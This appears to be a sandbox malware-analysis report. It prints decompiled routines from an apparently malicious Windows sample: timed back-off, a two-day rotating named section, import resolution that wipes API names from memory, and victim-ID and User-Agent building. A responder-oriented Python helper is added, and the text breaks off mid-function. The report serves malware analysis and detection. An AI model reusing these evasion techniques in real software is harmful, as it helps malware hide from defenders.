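With the assumed values the schedule is a 300 s initial sleep, slot 1 succeeding, slot 2 skipped because bit 0 of the flags is clear, then slot 3 attempted three times: the 0x10d2 status buys a 5 minute sleep, the generic failure a 60 s sleep, and the third attempt reaches E00FA259A. When reading the configuration out of a dump, the check that matters is that 0xFF676980 and 0xDC3CBA00 are -10,000,000 and -600,000,000: a negative due time is relative, so the dword at 0xfad1f8 and 0xfad1fc is a delay in seconds and the one at 0xfad200 a delay in minutes.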
                                      Instruction addresses for this listing: 0x00fa9c23 to 0x00fa9dbf (per-line address column)

                                      APIs
                                      • memset.NTDLL ref: 00FA9C38
                                      • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00FA9C44
                                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00FA9C69
                                      • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00FA9C85
                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FA9C9E
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 00FA9D33
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00FA9D42
                                      • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00FA9D7C
                                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00FA7299), ref: 00FA9D92
                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FA9D9D
                                        • Part of subcall function 00FA4B22: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03A49328,00000000,?,73BCF710,00000000,73BCF730), ref: 00FA4B71
                                        • Part of subcall function 00FA4B22: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03A49360,?,00000000,30314549,00000014,004F0053,03A4931C), ref: 00FA4C0E
                                        • Part of subcall function 00FA4B22: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FA9CB1), ref: 00FA4C20
                                      • GetLastError.KERNEL32 ref: 00FA9DAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$ChangeCloseCreateErrorFindLastNotificationmemset
                                      • String ID:
                                      • API String ID: 1236040543-0
                                      • Opcode ID: a1be9b856d7baaf35530aa42273d1514e685b20d1b48853b1a8b972ef524be6a
                                      • Instruction ID: 673e8668909481dff6530a4a9bad326380ef801637949e4beda900c1b6bedd71
                                      • Opcode Fuzzy Hash: a1be9b856d7baaf35530aa42273d1514e685b20d1b48853b1a8b972ef524be6a
                                      • Instruction Fuzzy Hash: 4D512FF5D05129EADF109F94DC449EEBFB9EF0A720F204126F511E6190D7B49A84EBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 73%
                                      			// Start-up routine: creates the private heap the other routines free into,
                                      			// runs a retrying back-off loop and records whether the process runs under WOW64.
                                      			E00FA24C2(void* __edx, intOrPtr _a4) {
                                      				struct _FILETIME _v12;
                                      				char _v32;
                                      				long _v40;
                                      				void* _t14;
                                      				void* _t16;
                                      				int _t18;
                                      				signed int _t20;
                                      				void* _t22;
                                      				signed int _t23;
                                      				intOrPtr _t25;
                                      				unsigned int _t29;
                                      				void* _t33;
                                      				signed int _t40;
                                      
                                      				_t33 = __edx;
                                      				_t14 = HeapCreate(0, 0x400000, 0); // executed: growable private heap, 4 MiB initial size
                                      				 *0xfad1f0 = _t14; // global heap handle
                                      				if(_t14 != 0) {
                                      					 *0xfad160 = GetTickCount(); // start time kept in a global
                                      					_t16 = E00FA4CF4(_a4);
                                      					if(_t16 != 0) {
                                      						L10:
                                      						return _t16;
                                      					} else {
                                      						goto L3;
                                      					}
                                      					do {
                                      						L3:
                                      						// Back-off: n = SwitchToThread() + ((FILETIME >> 7) % 9), then Sleep(2 << n),
                                      						// i.e. 2 ms .. 1024 ms, repeated while E00FA85F0 asks for another attempt.
                                      						GetSystemTimeAsFileTime( &_v12);
                                      						_t18 = SwitchToThread();
                                      						_t29 = _v12.dwHighDateTime;
                                      						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                      						_push(0);
                                      						_push(9);
                                      						_push(_t29 >> 7);
                                      						_push(_t20);
                                      						L00FAB04E(); // _aullrem(value, 9): 64-bit unsigned remainder, see the API list below
                                      						_t40 = _t18 + _t20;
                                      						_t22 = E00FA85F0(_a4, _t40);
                                      						_t23 = 2;
                                      						Sleep(_t23 << _t40); // executed
                                      					} while (_t22 == 1);
                                      					_t25 =  *0xfad20c; // 0x29c: the process handle IsWow64Process is called on
                                      					_v32 = 0;
                                      					if(_t25 != 0) {
                                      						__imp__(_t25,  &_v32); // IsWow64Process, per the API list below
                                      						if(_t25 == 0) {
                                      							_v40 = 0;
                                      						}
                                      						if(_v40 != 0) {
                                      							 *0xfad218 = 1; // executed: global "running under WOW64" flag
                                      						}
                                      					}
                                      					_t16 = E00FA707F(_t33); // executed
                                      					goto L10;
                                      				}
                                      				_t16 = 8; // ERROR_NOT_ENOUGH_MEMORY when HeapCreate fails
                                      				goto L10;
                                      			}

                                      APIs
                                      • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FA24D7
                                      • GetTickCount.KERNEL32 ref: 00FA24EE
                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00FA250E
                                      • SwitchToThread.KERNEL32(?,00000001), ref: 00FA2514
                                      • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00FA2530
                                      • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00FA254A
                                      • IsWow64Process.KERNEL32(0000029C,?,?,00000001), ref: 00FA2568
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                      • String ID: !I
                                      • API String ID: 3690864001-1739487307
                                      • Opcode ID: 76cf54e0f08e75333430e22ce6fb5f31f650c1f85da4dd41b10c3ac059512916
                                      • Instruction ID: f6128b50d1ae151ed990f18212990ab024f075bf8fd003f23acda6b0708349bf
                                      • Opcode Fuzzy Hash: 76cf54e0f08e75333430e22ce6fb5f31f650c1f85da4dd41b10c3ac059512916
                                      • Instruction Fuzzy Hash: 2421D5F2E00309AFD310AF68DC89B2A7BE8BB46360F048929F505C2150E774DC04ABA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 69%
                                      			// Opens (or, when _a4 != 0, creates) a named pagefile-backed section whose
                                      			// name carries a value that changes only every two days, and maps a view of it.
                                      			// Returns 0 on success or a Win32 error code.
                                      			E10001DBD(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                      				intOrPtr _v12;
                                      				struct _FILETIME* _v16;
                                      				short _v60;
                                      				struct _FILETIME* _t14;
                                      				intOrPtr _t15;
                                      				long _t18;
                                      				void* _t19;
                                      				void* _t22;
                                      				intOrPtr _t31;
                                      				long _t32;
                                      				void* _t34;
                                      
                                      				_t31 = __edx;
                                      				_t14 =  &_v16;
                                      				GetSystemTimeAsFileTime(_t14);
                                      				// _aulldiv(FILETIME, 0x192:0x54D38000): the divisor is exactly two days in
                                      				// 100 ns units (1,728,000,000,000), so the quotient is stable for 48 hours.
                                      				_push(0x192);
                                      				_push(0x54d38000);
                                      				_push(_v12);
                                      				_push(_v16);
                                      				L10002150(); // _aulldiv
                                      				_push(_t14); // low dword of the quotient becomes a format argument
                                      				_v16 = _t14;
                                      				_t15 =  *0x10004150; // base of the decoded string table
                                      				_push(_t15 + 0x1000505e); // string argument for the format
                                      				_push(_t15 + 0x10005054); // format string of the section name
                                      				_push(0x16); // 22 wide characters available in _v60
                                      				_push( &_v60);
                                      				_v12 = _t31;
                                      				L1000214A(); // _snwprintf: builds the section name in _v60
                                      				_t18 = _a4;
                                      				if(_t18 == 0) {
                                      					_t18 = 0x1000; // default section size when only attaching
                                      				}
                                      				// hFile = INVALID_HANDLE_VALUE (pagefile-backed), PAGE_READWRITE (4),
                                      				// SECURITY_ATTRIBUTES at 0x10004140, name from _v60.
                                      				_t19 = CreateFileMappingW(0xffffffff, 0x10004140, 4, 0, _t18,  &_v60); // executed
                                      				_t34 = _t19;
                                      				if(_t34 == 0) {
                                      					_t32 = GetLastError();
                                      				} else {
                                      					// With _a4 == 0 the caller only wants a section another instance already
                                      					// created: ERROR_ALREADY_EXISTS (0xB7) is the success case, a freshly
                                      					// created section is closed again and reported as 2 (ERROR_FILE_NOT_FOUND).
                                      					if(_a4 != 0 || GetLastError() == 0xb7) {
                                      						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed: FILE_MAP_READ | FILE_MAP_WRITE
                                      						if(_t22 == 0) {
                                      							_t32 = GetLastError();
                                      							if(_t32 != 0) {
                                      								goto L9;
                                      							}
                                      						} else {
                                      							 *_a8 = _t34; // section handle out
                                      							 *_a12 = _t22; // view base out
                                      							_t32 = 0;
                                      						}
                                      					} else {
                                      						_t32 = 2;
                                      						L9:
                                      						CloseHandle(_t34);
                                      					}
                                      				}
                                      				return _t32;
                                      			}

                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A,?), ref: 10001DCA
                                      • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001DE0
                                      • _snwprintf.NTDLL ref: 10001E05
                                      • CreateFileMappingW.KERNELBASE(000000FF,10004140,00000004,00000000,?,?), ref: 10001E2A
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A), ref: 10001E41
                                      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001E55
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A), ref: 10001E6D
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF), ref: 10001E76
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100011EF,0000000A), ref: 10001E7E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                      • String ID:
                                      • API String ID: 1724014008-0
                                      • Opcode ID: 3e50b0ca96fbb660fa132a8ea15d9b9b0234b2ec6109b3d8873d61701b05dd08
                                      • Instruction ID: dbe4e35e6c100b16ed0acdc6d2f503e8b12c3812d0dbe5f01d31c7253bde5613
                                      • Opcode Fuzzy Hash: 3e50b0ca96fbb660fa132a8ea15d9b9b0234b2ec6109b3d8873d61701b05dd08
                                      • Instruction Fuzzy Hash: 71217CB2600158BFF711EFA8CC88EDF7BADEB483D0F118165FA15D7198DA3099458B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 74%
                                      			// Same routine as E10001DBD, compiled into the main image: attaches to the
                                      			// named section (fixed size 0x1000) and only succeeds if it already existed.
                                      			E00FA6D4A(intOrPtr __edx, void** _a4, void** _a8) {
                                      				intOrPtr _v8;
                                      				struct _FILETIME* _v12;
                                      				short _v56;
                                      				struct _FILETIME* _t12;
                                      				intOrPtr _t13;
                                      				void* _t17;
                                      				void* _t21;
                                      				intOrPtr _t27;
                                      				long _t28;
                                      				void* _t30;
                                      
                                      				_t27 = __edx;
                                      				_t12 =  &_v12;
                                      				GetSystemTimeAsFileTime(_t12);
                                      				// _aulldiv(FILETIME, 0x192:0x54D38000): divisor is exactly two days in 100 ns units
                                      				_push(0x192);
                                      				_push(0x54d38000);
                                      				_push(_v8);
                                      				_push(_v12);
                                      				L00FAAEEA(); // _aulldiv
                                      				_push(_t12); // low dword of the quotient becomes a format argument
                                      				_v12 = _t12;
                                      				_t13 =  *0xfad230; // 0x2a9a5a8: heap address outside the image (decoded string table)
                                      				_t5 = _t13 + 0xfae84d; // 0x3a48df5: string argument for the format
                                      				_t6 = _t13 + 0xfae580; // 0x530025: if this annotation shows memory contents, it is the UTF-16 pair "%S"
                                      				_push(0x16); // 22 wide characters available in _v56
                                      				_push( &_v56);
                                      				_v8 = _t27;
                                      				L00FAAC0A(); // _snwprintf: builds the section name in _v56
                                      				// hFile = INVALID_HANDLE_VALUE (pagefile-backed), PAGE_READWRITE (4), size 0x1000
                                      				_t17 = CreateFileMappingW(0xffffffff, 0xfad234, 4, 0, 0x1000,  &_v56); // executed
                                      				_t30 = _t17;
                                      				if(_t30 == 0) {
                                      					_t28 = GetLastError();
                                      				} else {
                                      					// Only ERROR_ALREADY_EXISTS (0xB7) counts as success: the section must have
                                      					// been created by another instance. A new section is closed and reported as 2.
                                      					if(GetLastError() == 0xb7) {
                                      						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed: FILE_MAP_READ | FILE_MAP_WRITE
                                      						if(_t21 == 0) {
                                      							_t28 = GetLastError();
                                      							if(_t28 != 0) {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							 *_a4 = _t30; // section handle out
                                      							 *_a8 = _t21; // view base out
                                      							_t28 = 0;
                                      						}
                                      					} else {
                                      						_t28 = 2;
                                      						L6:
                                      						CloseHandle(_t30);
                                      					}
                                      				}
                                      				return _t28;
                                      			}

                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00FA7115,?,00000001,?), ref: 00FA6D56
                                      • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00FA6D6C
                                      • _snwprintf.NTDLL ref: 00FA6D91
                                      • CreateFileMappingW.KERNELBASE(000000FF,00FAD234,00000004,00000000,00001000,?), ref: 00FA6DAD
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FA7115,?), ref: 00FA6DBF
                                      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00FA6DD6
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FA7115), ref: 00FA6DF7
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FA7115,?), ref: 00FA6DFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                      • String ID:
                                      • API String ID: 1814172918-0
                                      • Opcode ID: c9f1579c43afb4f2b0e8d7140f797dca76c587c9c65c286935b25c220493570c
                                      • Instruction ID: 46d3f293d6fafaba035cda0bfeb530cca26b94cc3db1184173bcc18224da6a3c
                                      • Opcode Fuzzy Hash: c9f1579c43afb4f2b0e8d7140f797dca76c587c9c65c286935b25c220493570c
                                      • Instruction Fuzzy Hash: A821E7F6A40208FBD7119F58DC45F9E37A9AB46750F294060F601E71D0DB70D905EBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%
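E10001DBD and E00FA6D4A above are one routine, present once in the module mapped at 0x10000000 and once in the main image. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample. It reproduces the _aulldiv arithmetic (the divisor 0x192:0x54D38000 is exactly two days in 100 ns FILETIME units), so the numeric value that goes into the section name can be computed for a known capture time, and it models the branch on ERROR_ALREADY_EXISTS. The format string and the string argument are not recoverable from the report, so only the numeric component is computed; window_value, window_values_around and mapping_open_result are illustration names.

```python
# Added example for this page (not code from the Joe Sandbox report or from
# the sample). Reproduces the time-window arithmetic of E10001DBD/E00FA6D4A
# and the way the routine interprets the CreateFileMappingW outcome.
import datetime

# Divisor handed to _aulldiv: high dword 0x192, low dword 0x54D38000.
WINDOW_100NS = (0x192 << 32) | 0x54D38000
assert WINDOW_100NS == 2 * 24 * 60 * 60 * 10_000_000   # exactly two days of 100 ns ticks

FILETIME_EPOCH = datetime.datetime(1601, 1, 1, tzinfo=datetime.timezone.utc)
ERROR_FILE_NOT_FOUND = 2
ERROR_ALREADY_EXISTS = 0xB7


def filetime_from_datetime(dt):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) for a timezone-aware datetime."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def window_value(filetime):
    """The quotient _aulldiv returns: FILETIME // (two days). This is the only
    time-derived input to the _snwprintf call that builds the section name."""
    return filetime // WINDOW_100NS


def window_value_for_date(year, month, day):
    """Window value at 00:00 UTC on the given calendar date."""
    dt = datetime.datetime(year, month, day, tzinfo=datetime.timezone.utc)
    return window_value(filetime_from_datetime(dt))


def window_values_around(year, month, day, slack=1):
    """Candidate values when the capture time of a dump is only roughly known:
    the window current on that date plus `slack` windows on either side."""
    base = window_value_for_date(year, month, day)
    return list(range(base - slack, base + slack + 1))


def mapping_open_result(handle_ok, last_error, create_allowed):
    """Mirror the branch structure after CreateFileMappingW.

    create_allowed corresponds to _a4 != 0 in E10001DBD; E00FA6D4A behaves
    as if it were always False. Returns the Win32 code the routine reports
    before MapViewOfFile is attempted (0 means it goes on to map the view).
    """
    if not handle_ok:
        return last_error                      # CreateFileMappingW failed outright
    if create_allowed or last_error == ERROR_ALREADY_EXISTS:
        return 0                               # attach to the section, MapViewOfFile next
    return ERROR_FILE_NOT_FOUND                # section was just created: close it, report 2
```

A responder who knows roughly when a dump was taken can enumerate the handful of candidate window values and look for section names carrying them in the handle tables of the processes in the process tree (loaddll32.exe, rundll32.exe, iexplore.exe). Because the value only changes every 48 hours, two processes started a day apart still agree on the name unless a window boundary fell between them, which is the failure mode the ERROR_ALREADY_EXISTS check turns into return code 2.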

                                      C-Code - Quality: 100%
                                      			E10001792(intOrPtr* _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				signed short _v12;
                                      				struct HINSTANCE__* _v16;
                                      				intOrPtr _v20;
                                      				_Unknown_base(*)()* _v24;
                                      				intOrPtr _t34;
                                      				intOrPtr _t36;
                                      				struct HINSTANCE__* _t37;
                                      				intOrPtr _t40;
                                      				CHAR* _t44;
                                      				_Unknown_base(*)()* _t45;
                                      				intOrPtr* _t52;
                                      				intOrPtr _t53;
                                      				signed short _t54;
                                      				intOrPtr* _t57;
                                      				signed short _t59;
                                      				CHAR* _t60;
                                      				CHAR* _t62;
                                      				signed short* _t64;
                                      				void* _t65;
                                      				signed short _t72;
                                      
                                      				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                      				_v8 = _v8 & 0x00000000;
                                      				_t52 = _a4;
                                      				if(_t34 == 0) {
                                      					L28:
                                      					return _v8;
                                      				}
                                      				_t57 = _t34 + _t52;
                                      				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                      				_a4 = _t57;
                                      				if(_t36 == 0) {
                                      					L27:
                                      					goto L28;
                                      				}
                                      				while(1) {
                                      					_t62 = _t36 + _t52;
                                      					_t37 = LoadLibraryA(_t62); // executed
                                      					_v16 = _t37;
                                      					if(_t37 == 0) {
                                      						break;
                                      					}
                                      					_v12 = _v12 & 0x00000000;
                                      					memset(_t62, 0, lstrlenA(_t62));
                                      					_t53 =  *_t57;
                                      					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                      					_t65 = _t65 + 0xc;
                                      					if(_t53 != 0) {
                                      						L6:
                                      						_t64 = _t53 + _t52;
                                      						_t54 =  *_t64;
                                      						if(_t54 == 0) {
                                      							L23:
                                      							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                      							_t57 = _t57 + 0x14;
                                      							_a4 = _t57;
                                      							if(_t36 != 0) {
                                      								continue;
                                      							}
                                      							L26:
                                      							goto L27;
                                      						}
                                      						_v20 = _t40 - _t64 + _t52;
                                      						_t72 = _t54;
                                      						L8:
                                      						L8:
                                      						if(_t72 < 0) {
                                      							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                      								_t59 = 0;
                                      								_v12 =  *_t64 & 0x0000ffff;
                                      							} else {
                                      								_t59 = _t54;
                                      							}
                                      						} else {
                                      							_t59 = _t54 + _t52;
                                      						}
                                      						_t20 = _t59 + 2; // 0x2
                                      						_t44 = _t20;
                                      						if(_t59 == 0) {
                                      							_t44 = _v12 & 0x0000ffff;
                                      						}
                                      						_t45 = GetProcAddress(_v16, _t44);
                                      						_v24 = _t45;
                                      						if(_t45 == 0) {
                                      							goto L21;
                                      						}
						if(_t59 != 0) {
							// Once resolved, the API name is zeroed in place (lstrlenA gives its length),
							// so a later memory dump no longer shows which imports were looked up.
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
                                      						 *(_v20 + _t64) = _v24;
                                      						_t64 =  &(_t64[2]);
                                      						_t54 =  *_t64;
                                      						if(_t54 != 0) {
                                      							goto L8;
                                      						} else {
                                      							L22:
                                      							_t57 = _a4;
                                      							goto L23;
                                      						}
						L21:
						_v8 = 0x7f; // 0x7f = ERROR_PROC_NOT_FOUND: GetProcAddress returned NULL
						goto L22;
                                      					}
                                      					_t53 = _t40;
                                      					if(_t40 == 0) {
                                      						goto L23;
                                      					}
                                      					goto L6;
                                      				}
				_v8 = 0x7e; // 0x7e = ERROR_MOD_NOT_FOUND: the Win32 code for a module that could not be loaded
                                      				goto L26;
                                      			}

                                      APIs
                                      • LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 100017C8
                                      • lstrlenA.KERNEL32(00000002), ref: 100017DE
                                      • memset.NTDLL ref: 100017E8
                                      • GetProcAddress.KERNEL32(?,00000002), ref: 1000184B
                                      • lstrlenA.KERNEL32(-00000002), ref: 10001860
                                      • memset.NTDLL ref: 1000186A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: lstrlenmemset$AddressLibraryLoadProc
                                      • String ID: ~
                                      • API String ID: 1986585659-1707062198
                                      • Opcode ID: 535752cf4838a6e0397bff52c85f66c34babbf5349c2da16149c6e0b63f83667
                                      • Instruction ID: aacf744330604d431cb8dcb6726508f1712f1da62006589e7fc56377ed95098c
                                      • Opcode Fuzzy Hash: 535752cf4838a6e0397bff52c85f66c34babbf5349c2da16149c6e0b63f83667
                                      • Instruction Fuzzy Hash: 0D314975A01215ABEB14CF59C890BEEB7F8FF44780F218029EC05EB249EB30EA01CB50
                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E00FA707F(signed int __edx) {
                                      				signed int _v8;
                                      				long _v12;
                                      				signed int _v16;
                                      				long _v20;
                                      				void* _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				char _v40;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t27;
                                      				long _t28;
                                      				long _t31;
                                      				intOrPtr _t32;
                                      				void* _t36;
                                      				signed int _t37;
                                      				intOrPtr _t38;
                                      				void* _t39;
                                      				CHAR* _t42;
                                      				long _t48;
                                      				long _t49;
                                      				void* _t54;
                                      				void* _t56;
                                      				intOrPtr _t64;
                                      				void* _t67;
                                      				long _t71;
                                      				void* _t72;
                                      				signed char _t74;
                                      				intOrPtr _t76;
                                      				signed int _t77;
                                      				long _t82;
                                      				long _t84;
                                      				CHAR* _t87;
                                      				void* _t88;
                                      
                                      				_t79 = __edx;
                                      				_v16 = 0;
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_t27 = E00FA286D();
                                      				if(_t27 != 0) {
                                      					_t77 =  *0xfad214; // 0x2000000a
                                      					_t73 = (_t77 & 0xf0000000) + _t27;
                                      					 *0xfad214 = (_t77 & 0xf0000000) + _t27;
                                      				}
				_t28 =  *0xfad134(0, 2); // executed
				_v20 = _t28;
				// The accepted results 0, 1 and 0x80010106 are S_OK, S_FALSE and RPC_E_CHANGED_MODE,
				// i.e. this indirect call behaves like CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
				// the call through 0xfad130 at L31 below is the matching teardown.
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                      					_t31 = E00FAA362( &_v8,  &_v16); // executed
                                      					_push(0);
                                      					_t84 = _t31;
					_t32 =  *0xfad230; // 0x2a9a5a8
					_push(0xfad238);
					_push(1);
					_t7 = _t32 + 0xfae5bc; // 0x4d283a53 = "S:(M": start of an SDDL string that carries a mandatory-label (ML) SACL
					 *0xfad234 = 0xc;
					 *0xfad23c = 0;
					L00FA7A28(); // ConvertStringSecurityDescriptorToSecurityDescriptorA(sddl, SDDL_REVISION_1, 0xfad238, NULL), ref 00FA7103
                                      					_t36 = E00FA6D4A(_t79,  &_v24,  &_v12); // executed
                                      					if(_t36 == 0) {
                                      						CloseHandle(_v24);
                                      					}
                                      					if(_t84 != 5) {
                                      						_t37 = _v16;
                                      						__eflags = _t37;
                                      						if(_t37 != 0) {
                                      							E00FA8B98(_t37 ^ 0xe8fa7dd7,  &_v40);
                                      							_t87 = E00FA550F(0x27);
                                      							__eflags = _t87;
                                      							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xfad230; // 0x2a9a5a8
								_t18 = _t64 + 0xfae916; // 0x78383025 = "%08x": the four byte-swapped dwords that E00FA8B98 derived from the user and computer name become a 32-hex-digit identifier
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                      								_t88 = _t88 + 0x18;
                                      							}
                                      							 *0xfad284 = _t87;
                                      						}
                                      						_t38 = E00FA7890();
                                      						 *0xfad228 =  *0xfad228 ^ 0xe8fa7dd7;
                                      						 *0xfad278 = _t38;
                                      						_t39 = E00FA550F(0x60);
                                      						__eflags = _t39;
                                      						 *0xfad2d4 = _t39;
                                      						if(_t39 == 0) {
							_t84 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                      						} else {
                                      							memset(_t39, 0, 0x60);
                                      							_t54 =  *0xfad2d4; // 0x3a49630
                                      							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40); // RtlInitializeCriticalSection, ref 00FA71DD
                                      							_t56 =  *0xfad2d4; // 0x3a49630
                                      							 *_t56 = 0xfae882;
                                      							_t84 = 0;
                                      						}
                                      						__eflags = _t84;
                                      						if(_t84 == 0) {
                                      							_t42 = RtlAllocateHeap( *0xfad1f0, _t84, 0x52);
                                      							__eflags = _t42;
                                      							 *0xfad270 = _t42;
                                      							if(_t42 == 0) {
								_t84 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                      							} else {
                                      								_t74 =  *0xfad214; // 0x2000000a
                                      								_t79 = _t74 & 0x000000ff;
                                      								_t76 =  *0xfad230; // 0x2a9a5a8
								_t19 = _t76 + 0xfae212; // 0x697a6f4d = "Mozi": a User-Agent template, filled with the version byte from 0xfad214 into the 0x52-byte heap buffer
                                      								_t73 = _t19;
                                      								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xfac2bf);
                                      							}
                                      							__eflags = _t84;
                                      							if(_t84 == 0) {
                                      								asm("sbb eax, eax");
                                      								E00FA8B98( ~_v8 &  *0xfad228, 0xfad00c);
                                      								_t84 = E00FA4D8D(_t73);
                                      								__eflags = _t84;
                                      								if(_t84 != 0) {
                                      									goto L31;
                                      								}
                                      								_t48 = E00FA9848(_t73); // executed
                                      								__eflags = _t48;
                                      								if(_t48 != 0) {
                                      									__eflags = _v8;
                                      									_t82 = _v12;
                                      									if(_v8 != 0) {
                                      										L30:
                                      										_t49 = E00FA9C23(_t79, _t82, _v8); // executed
                                      										_t84 = _t49;
                                      										goto L31;
                                      									}
                                      									__eflags = _t82;
                                      									if(__eflags == 0) {
                                      										goto L31;
                                      									}
                                      									_t23 = _t82 + 4; // 0x5
                                      									_t84 = E00FA524A(__eflags, _t23);
                                      									__eflags = _t84;
                                      									if(_t84 == 0) {
                                      										goto L31;
                                      									}
                                      									goto L30;
                                      								}
								_t84 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                      							}
                                      						}
                                      					} else {
                                      						_t71 = _v12;
                                      						if(_t71 == 0) {
                                      							L31:
                                      							if(_v20 == 0 || _v20 == 1) {
